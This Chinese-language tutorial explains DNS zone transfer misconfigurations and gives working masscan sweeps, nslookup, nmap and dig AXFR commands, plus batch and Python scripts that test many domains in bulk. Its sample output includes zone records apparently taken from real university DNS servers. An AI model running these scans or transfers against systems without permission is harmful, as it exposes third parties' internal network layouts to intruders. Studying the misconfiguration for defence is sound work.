黑客是如何利用DNS域传送漏洞进行渗透与攻击的？

一、DNS域传送

DNS ：Domain Name System

一个保存IP地址和域名相互映射关系的分布式数据库，重要的互联网基础设施，默认使用的TCP/UDP端口号是53

常见DNS记录类型：

1 A       IP地址记录,记录一个域名对应的IP地址
2 AAAA    IPv6 地址记录，记录一个域名对应的IPv6地址
3 CNAME   别名记录，记录一个主机的别名
4 MX      电子邮件交换记录，记录一个邮件域名对应的IP地址，如root@xxxx.com
5 NS      域名服务器记录 ,记录该域名由哪台域名服务器解析
6 PTR     反向记录，也即从IP地址到域名的一条记录
7 TXT     记录域名的相关文本信息

域传送 ：DNS Zone Transfer

是指后备服务器从主服务器拷贝数据，并用得到的数据更新自身数据库，在主备服务器之间同步数据库，需要使用“DNS域传送”

DNS服务器分为：主服务器、备份服务器和缓存服务器

---

二、漏洞收集

2.1 利用网络搜索引擎收集域名服务器

shodan：https://www.shodan.io

zoomeye：https://www.zoomeye.org

fofa：https://fofa.so

2.2 利用masscan收集dns服务器 

masscan：https://github.com/robertdavidgraham/masscan

Debian/Ubuntu安装：

1 sudo apt-get install git gcc make libpcap-dev
2 git clone https://github.com/robertdavidgraham/masscan
3 cd masscan
4 make

扫描网段：

1 ./bin/masscan -p:53 -oX ns.xml --rate 160000 101.0.0.0-110.0.0.0

获得开放53端口的潜在漏洞DNS服务器对象

ns.xml结果去重：

 1 from lxml import etree
 2 port = None
 3 address = None
 4 parsedServers = []
 5 #Opens the file used to store single enteries.
 6 outputFile = open('ns.txt', 'a')
 7 for event, element in etree.iterparse('ns.xml', tag="host"):
 8     for child in element:
 9         if child.tag == 'address':
10             address = child.attrib['addr']
11         if child.tag == 'ports':
12             for a in child:
13                 port = a.attrib['portid']
14         if port > 1 and address > 1:
15             if address not in parsedServers:
16                 print(address)
17                 outputFile.write(address + '\n')
18                 parsedServers.append(address)
19             port = None
20             address = None
21     element.clear()
22 outputFile.close()
23 print('End…………………………')

2.3  目标针对 

针对某个目标域名，查询目标所处域dns服务器是否有域传送漏洞，从而获得横向渗透的机会和更多的可能性。见下文：

1 nslookup结合dig的科学利用

2.4 后人乘凉 

我们稍微无耻一下，用一下别人收集好的dns服务器与域名：https://github.com/lijiejie/edu-dns-zone-transfer/blob/master/vulnerable_hosts.txt

ps: 收集dns服务器，推测出网段与解析的域，从而检测DNS是否存在域传送漏洞

---

三、漏洞检测与利用

3.1 原理

1 DNS服务器配置不当，导致匿名用户利用DNS域传送协议获取某个域的所有记录；
2 通过可以实现DNS域传送协议的程序，尝试匿名进行DNS域传送，获取记录

3.2 危害

1 网络拓扑结构泄露给潜在的攻击者，包括一些安全性较低的内部主机，如测试服务器等。直接加快、助长攻击者的入侵过程

3.3 检测与利用

3.3.1  nslookup 

基本过程：

1 输入nslookup命令进入交互式shell;
2 server 命令参数设定查询将要使用的DNS服务器;
3 ls命令列出某个域中的所有域名;
4 exit命令退出

失败案例

现在域传送漏洞不太好找

 1 > nslookup
 2 DNS request timed out.
 3     timeout was 2 seconds.
 4 默认服务器:  UnKnown
 5 Address:  114.114.114.114
 6
 7 > server ss2.bjfu.edu.cn
 8 默认服务器:  ss2.bjfu.edu.cn
 9 Address:  202.204.112.67
10
11 > ls bjfu.edu.cn
12 [ss2.bjfu.edu.cn]
13 *** 无法列出域 bjfu.edu.cn: Query refused
14 DNS 服务器拒绝将区域 bjfu.edu.cn 传送到你的计算机。如果这不正确，
15 请检查 IP 地址 202.204.112.67 的 DNS 服务器上 bjfu.edu.cn 的
16 区域传送安全设置。

成功案例

 1 > nslookup
 2 默认服务器:  public1.114dns.com
 3 Address:  114.114.114.114
 4
 5 > server ring.cugb.edu.cn
 6 默认服务器:  ring.cugb.edu.cn
 7 Address:  202.204.105.1
 8
 9 > ls cugb.edu.cn
10 [ring.cugb.edu.cn]
11  cugb.edu.cn.                   NS     server = ring.cugb.edu.cn
12  cugb.edu.cn.                   A      127.0.0.1
13  acm                            A      121.194.86.2
14  bbs                            A      202.204.105.172
15  bm                             A      202.204.105.179
16  bsbm                           A      202.204.105.17
17  bslt                           A      202.204.109.241
18  cas                            A      202.204.105.97
19  ce                             A      202.204.99.249
20  chushi                         A      202.204.105.243
21  cj                             A      202.204.96.111
22  cms                            A      202.204.105.179
23  computer                       A      202.204.96.202
24  csc                            A      202.204.97.60
25  cugblx                         A      202.204.105.173
26 .
27 .
28 .
29 .
30  yx                             A      202.204.105.179
31  zhsh                           A      202.204.105.198
32  zzb                            A      202.204.105.243
33 >

非交互式方法 ：
为了避免和nslookup交换，可以编写一个ls.bat

1 echo ls %1 | nslookup – %2

%1代表第一个参数，即xxx.edu.cn 
%2代表第二个参数，即dns.xxx.edu.cn 
echo是回声命令，原文输出传入的参数内容

测试dns.xxx.edu.cn服务器，可以执行命令：

1 ls.bat xxx.edu.cn dns.xxx.edu.cn

3.3.2 nmap

1 nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn

dns-zone-transfer.domain指定要查询的域

dns.xxx.edu.cn为指定的查询域名服务器

成功的话会如下所示，列出了指定域中所有的记录(如果端口屏蔽，就查不出了，不太实用)：

 1 > nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=hzmc.edu.cn -p 53 -Pn dns.hzmc.edu.cn
 2
 3 Starting Nmap 7.10 ( https://nmap.org ) at ****
 4 Nmap scan report for dns.hzmc.edu.cn (211.86.0.1)
 5 Host is up (0.38s latency).
 6 PORT   STATE SERVICE
 7 53/tcp open  domain
 8 | dns-zone-transfer:
 9 | hzmc.edu.cn.           SOA    ns.hzmc.edu.cn. root.ns.hzmc.edu.cn.
10 | hzmc.edu.cn.           NS     ns.hzmc.edu.cn.
11 | hzmc.edu.cn.           NS     dns.hzmc.edu.cn.
12 | hzmc.edu.cn.           A      211.86.0.1
13 | hzmc.edu.cn.           MX     10 ns.hzmc.edu.cn.
14 | dns.hzmc.edu.cn.       A      211.86.0.1
15 | ftp.hzmc.edu.cn.       CNAME  dns.hzmc.edu.cn.
16 | www.jwc.hzmc.edu.cn.   A      211.86.3.182
17 | www.lib.hzmc.edu.cn.   A      211.86.3.38
18 | www.spdb.hzmc.edu.cn.  A      211.86.0.3
19 | www.hzmc.edu.cn.       A      211.86.0.4
20 | www.yzzp.hzmc.edu.cn.  A      211.86.0.8
21 | www.zwc.hzmc.edu.cn.   A      211.86.2.200
22 |_hzmc.edu.cn.           SOA    ns.hzmc.edu.cn. root.ns.hzmc.edu.cn.
23
24 Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds

3.3.3 dig 

Windows免安装版dig下载地址：http://download.csdn.net/detail/c465869935/9700646

使用命令：

1 dig @dns.xxx.edu.cn axfr xxx.edu.cn

@指定域名服务器；axfr 为域传送指令；xxx.edu.cn表示要查询的域名

成功测试：

 1 > dig @ring.cugb.edu.cn axfr cugb.edu.cn
 2
 3 ; <<>> DiG 9.11.0-P1 <<>> @ring.cugb.edu.cn axfr cugb.edu.cn
 4 ; (1 server found)
 5 ;; global options: +cmd
 6 cugb.edu.cn.            86400   IN      SOA     ring.cugb.edu.cn. root.cugb.edu.cn. 20130504 86400 3600 604800 10800
 7 cugb.edu.cn.            86400   IN      TXT     "v=spf1 ip4:202.204.105.6/24 ~all"
 8 cugb.edu.cn.            86400   IN      NS      ring.cugb.edu.cn.
 9 cugb.edu.cn.            86400   IN      MX      5 mail.cugb.edu.cn.
10 cugb.edu.cn.            86400   IN      A       127.0.0.1
11 cugb.edu.cn.            86400   IN      AAAA    ::1
12 acm.cugb.edu.cn.        86400   IN      A       121.194.86.2
13 bbs.cugb.edu.cn.        86400   IN      A       202.204.105.172
14 bm.cugb.edu.cn.         86400   IN      A       202.204.105.179
15 .
16 .
17 .
18 .
19 zhsh.cugb.edu.cn.       86400   IN      A       202.204.105.198
20 zzb.cugb.edu.cn.        86400   IN      A       202.204.105.243
21 cugb.edu.cn.            86400   IN      SOA     ring.cugb.edu.cn. root.cugb.edu.cn. 20130504 86400 3600 604800 10800
22 ;; Query time: 46 msec
23 ;; SERVER: 202.204.105.1#53(202.204.105.1)
24 ;; WHEN: ****
25 ;; XFR size: 114 records (messages 1, bytes 2562)

dig的批处理利用 For Windows

建立文件： .LandGrey-Dns-Zone-Transfer-Scan.bat

下载链接：http://download.csdn.net/detail/c465869935/9700869

写入以下内容：

1 @echo off
2 Rem Build By LandGrey
3 title Dns Zone Transfer Scan
4 echo +++++++++++++++++++++++++++++ LandGrey Dns Zone Transfer Scan bat +++++++++++++++++++++++++++++
5 for /f "tokens=1,2 delims= " %%i in (%cd%/dns-zone-transfer/hostlist.txt) do echo Scanning %%j & %cd%\dig.exe @%%i axfr %%j>> %cd%/dns-zone-transfer/ScanResults.txt

解释：

整个批处理主要是for循环一行一行的读取当前目录下的“/dns-zone-transfer/hostlist.txt”文件，进行工作； %cd% 代表bat文件当前目录；delims=指定分隔符；表示读取的一行文本以空格来分隔；当然，也可以自己修改分隔符；tokens=1,2 表示取以分隔符分隔的第一个和第二个元素；do后面是具体做的事: 一边提示正在扫描的域名，一边扫描域传送漏洞；在批处理中，%%i用来代指第一个元素，根据字母顺序（i,j,k…），%%j指代第二个元素，以此类推； dig.exe @%%i axfr %%j 即dig @dns.xxx.edu.cn axfr xxx.edu.cn的替换模版； 这就要求hostlist.txt文件中的书写格式应该为:“[dns-server] [domain]”，类似于如下的形式：

1 dns.xxx.edu.cn xxx.edu.cn

%cd%\dig.exe表示 .LandGrey-Dns-Zone-Transfer-Scan.bat文件要与dig.exe放在同一个目录下； 最后查询结果全部保存在当前目录下的：“/dns-zone-transfer/ScanResults.txt”文件中；

nslookup结合dig的科学利用

如果获得了目标域名，并不清楚目标的主dns服务器时，可以通过用如下的nslookup语句，先查询目标域名的主dns服务器，然后再用dig进行DNS域传送检测，最后用python脚本实现：

1 > nslookup -type=ns landgrey.cn
2 服务器:  public1.114dns.com
3 Address:  114.114.114.114
4
5 非权威应答:
6 landgrey.cn     nameserver = dns9.hichina.com
7 landgrey.cn     nameserver = dns10.hichina.com

单个查询(实用)

下载地址：https://github.com/LandGrey/dns-zone-transfer-tester/blob/master/dztester.py

 1 #!/usr/bin/env python
 2 # coding:utf-8
 3 #
 4 # Build by LandGrey 2016-12-03
 5 #
 6
 7 import re
 8 import os
 9 import sys
10
11
12 def dns_zone_tranfer_finder(domain):
13     print('[+] Nslookup %s' % domain)
14     cmd_res = os.popen('nslookup -type=ns ' + domain).read()  # fetch DNS Server List
15     dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
16     if len(dns_servers) == 0:
17         print('[+] No DNS Server Found!\n')
18         exit(0)
19     for singledns in dns_servers:
20         print('[+] Using @%s' % singledns)
21         cmd_res = os.popen('dig @%s axfr %s' % (singledns, domain)).read()
22         # print cmd_res
23         if cmd_res.find('XFR size') > 0:
24             print('[+] Vulnerable dns server found:'), singledns
25             print(cmd_res)
26         else:
27             print('[+] No Vulnerable found')
28
29
30 def usage():
31     print('[+] Usage: python DZT-tester.py [domain]\n')
32
33
34 if __name__ == "__main__":
35     if len(sys.argv) != 2:
36         usage()
37     elif '-h' in sys.argv[1]:
38         usage()
39     else:
40         domain = sys.argv[1]
41         print('[+] Test %s' % domain)
42         dns_zone_tranfer_finder(domain)
43         print('[+] Finished!')

使用方式：

1 python dztester.py [domain]

批量查询

脚本同一目录下应有‘dns-zone-transfer’目录；'dns-zone-transfer’目录下有‘dns’子目录； 要检测的域名列表存放在‘dns-zone-transfer\domain.txt’中，一行一个；结果存在'dns-zone-transfer\dns'目录和'dns-zone-transfer\vulnerable_hosts.txt'文件中

 1 # coding:utf-8
 2
 3 import re
 4 import os
 5 import sys
 6 import threading
 7
 8
 9 def dns_zone_tranfer_finder():
10     global c_index
11     while True:
12         lock.acquire()
13         if c_index >= len(DomainLists):
14             lock.release()
15             break
16         domain = DomainLists[c_index].lstrip('www.')
17         c_index += 1
18         lock.release()
19         cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
20         dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
21         for server in dns_servers:
22             if len(server) < 5:
23                 server += domain
24             cmd_res = os.popen('dig @%s axfr %s +short' % (server, domain)).read()
25             if cmd_res.find('XFR size') > 0 \
26                     and cmd_res.find('Transfer failed.') < 0 \
27                     and cmd_res.find('connection timed out') < 0:
28                 lock.acquire()
29                 print('*' * 10 + ' Vulnerable dns server found:', server, '*' * 10)
30                 lock.release()
31                 with open(os.path.join(currentdir, 'dns-zone-transfer', 'vulnerable_hosts.txt'), 'a') as f:
32                     f.write('%s    %s\n' % (server.ljust(30), domain))
33                 with open(os.path.join(currentdir, 'dns-zone-transfer', 'dns', server + '.txt'), 'w') as f:
34                     f.write(cmd_res)
35
36
37 if __name__ == "__main__":
38     currentdir = os.path.dirname(sys.argv[0])
39     target = open(os.path.join(currentdir, 'dns-zone-transfer', 'domain.txt'))
40     DomainLists = []
41     for host in target.readlines():
42         DomainLists.append(host)
43     print(u'采集 %d 个...' % len(DomainLists))
44     threads = []
45     c_index = 0
46     lock = threading.Lock()
47     for i in range(10):
48         t = threading.Thread(target=dns_zone_tranfer_finder)
49         t.start()
50         threads.append(t)
51     for t in threads:
52         t.join()
53     print('All Done!')

漏洞存在标识主要是dig命令结果中出现特征字符串“XFR size”

运行起来类似下面这样：

1 ********** Vulnerable dns server found: nknu.nknu.edu.tw **********
2 ********** Vulnerable dns server found: ns2.ntnu.edu.tw **********
3 ********** Vulnerable dns server found: ns2.must.edu.mo **********
4 All Done!

---

四、免责声明

本文仅做技术研究，切勿用本文方法违法犯罪！

---

更多独家精彩内容  请扫码关注个人公众号，一起Coding吧！

---

——  ——  ——  ——  —  END  ——  ——  ——  ——  ————

　　　　　　　  欢迎扫码关注我的公众号

　　　　　　　　　　小鸿星空科技